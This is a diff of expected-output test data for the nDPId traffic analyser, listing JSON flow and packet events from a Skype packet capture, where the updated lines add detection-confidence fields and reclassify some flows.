-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1570,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690133,"flow_last_seen":1431970690133,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1431970690133,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431970690190,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"ts_msec":1431970690190,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA16YwAQDU7dViBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAsABBfOIaY="}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1573,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970690133,"flow_last_seen":1431970690190,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970690190,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59788,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690191,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970690191,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431970690191,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970690191,"pkt":"0NQSxnP1PBXCt3IOCABFAABA15NAAEAGZ+bAqAEiF84hpshfAbtO4sWoAAAAALAC\/\/\/AXwAAAgQFtAEDAwUBAQgKPjJehwAAAAAEAgAA"}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970690235,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7yF8ZBQnnTuLFqaASOJBGLgAAAgQFrAQCCArsPkNyPjJehwEDAwU="}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970690235,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z6tAAEAGb9rAqAEiF84hpshfAbtO4sWpGQUJ6IAQECydKQAAAQEICj4yXrLsPkNy"}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1579,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970690191,"flow_last_seen":1431970690235,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1431970690235,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1611,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970690890,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtBpAAEAGkJfAqAEiW77YfchgMD4BM37JAAAAALAC\/\/8o9wAAAgQFtAEDAwUBAQgKPjJhMgAAAAAEAgAA"}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1612,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970690890,"flow_last_seen":1431970690890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970690890,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -950,41 +949,41 @@
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2118,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431970707176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970707176,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0qAZAAEAG9C3AqAEi1KEIJMh2NFCv5GiYqQ976IAQECzb9gAAAQEICj4yoDA\/p5PE"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_packet_id":1,"flow_last_seen":1431970707911,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"ts_msec":1431970707911,"pkt":"0NQSxnP1PBXCt3IOCABFAAAu+nsAAEAR9XPAqAEihexDGTLdwCsAGiMOfdMCo1rvIegrMqRysYXm5vlz"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970707911,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970708715,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708715,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":51319,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2145,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431970708715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970708715,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWHtAAEAGQ63AqAEi1KEIJMh3NFBvQ5mUAAAAALAC\/\/+uawAAAgQFtAEDAwUBAQgKPjKmLwAAAAAEAgAA"}
-00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00626{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970687262,"flow_last_seen":1431970687262,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"189.188.134.174","src_port":13021,"dst_port":22436,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970651380,"flow_last_seen":1431970679567,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":441,"flow_avg_l4_payload_len":31,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.45","src_port":51240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634648,"flow_last_seen":1431970634648,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61016,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970659480,"flow_last_seen":1431970693361,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.175","src_port":51250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970668514,"flow_last_seen":1431970696319,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":51259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970673563,"flow_last_seen":1431970703649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":51268,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00622{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1431970684583,"flow_last_seen":1431970684880,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.48","src_port":51283,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970707911,"flow_last_seen":1431970707911,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"133.236.67.25","src_port":13021,"dst_port":49195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970670304,"flow_last_seen":1431970696803,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":61095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
